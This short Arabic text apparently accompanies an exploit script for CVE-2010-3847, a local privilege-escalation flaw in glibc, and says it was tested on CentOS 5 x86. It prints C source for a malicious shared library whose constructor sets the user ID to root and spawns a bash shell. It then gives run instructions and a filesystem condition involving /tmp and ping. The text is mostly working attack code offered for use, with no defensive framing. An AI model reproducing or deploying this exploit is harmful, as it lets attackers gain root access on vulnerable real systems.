
سكربت لاستغلال CVE-2010-3847
يهدف إلى أتمتة استغلال الثغرة التي نوقشت في [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. تم اختباره على CentOS 5 x86.
إن DSO الذي يُخرجه مُجمّع من الكود التالي:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
قم بتنزيله، وضعه في مكان قابل للتنفيذ، وقم بتشغيله.
/tmp وأي مكان يوجد فيه ping يجب أن يكونا على نفس نظام الملفات. إذا لم يكونا كذلك، قم بتعديل المسارات وفقًا لذلك.